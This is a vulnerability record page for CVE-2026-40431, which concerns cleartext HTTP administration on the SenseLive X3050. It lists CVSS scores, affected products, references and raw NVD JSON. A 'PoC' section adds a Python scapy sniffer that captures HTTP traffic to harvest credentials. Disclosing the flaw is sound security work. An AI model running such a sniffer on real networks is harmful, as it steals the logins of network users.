CVE-2026-40431

Description

A vulnerability exists in SenseLive X3050’s web management interface due to its reliance on unencrypted HTTP for all administrative communication. Because management traffic, including authentication attempts and configuration data, is transmitted in cleartext, an attacker with access to the same network segment could intercept or observe sensitive operational information.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:senselive:x3500_firmware:1.523:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:senselive:x3500:-:*:*:*:*:*:*:* - NOT VULNERABLE

SenseLive X3050

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import scapy.all as scapy

def packet_callback(packet):
    if packet.haslayer(scapy.TCP) and packet.haslayer(scapy.Raw):
        # Check if it's HTTP traffic (port 80)
        if packet[scapy.TCP].dport == 80 or packet[scapy.TCP].sport == 80:
            payload = packet[scapy.Raw].load.decode('utf-8', errors='ignore')
            # Print packet payload containing credentials
            print(f"[+] Captured HTTP Packet:\n{payload}")

# Start sniffing on the network interface (e.g., eth0)
print("[*] Starting sniffer on port 80...")
scapy.sniff(iface="eth0", store=False, prn=packet_callback)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40431
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40431
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40431/
[4] VulDB https://vuldb.com/cve/CVE-2026-40431
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-111-12.json
[6] https://senselive.io/contact
[7] https://www.cisa.gov/news-events/ics-advisories/icsa-26-111-12

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40431", "sourceIdentifier": "[email protected]", "published": "2026-04-24T00:16:28.527", "lastModified": "2026-04-28T19:33:07.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in SenseLive X3050’s web management interface due to its reliance on unencrypted HTTP for all administrative communication. Because management traffic, including authentication attempts and configuration data, is transmitted in cleartext, an attacker with access to the same network segment could intercept or observe sensitive operational information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:senselive:x3500_firmware:1.523:*:*:*:*:*:*:*", "matchCriteriaId": "F0A28FFE-3268-48DC-BB85-77009904F0D0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:senselive:x3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "42742F99-96EF-412E-9D7C-8C2155C3DCE1"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-111-12.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://senselive.io/contact", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-111-12", "source": "[email protected]", "tags": ["US Government Resource"]}]}}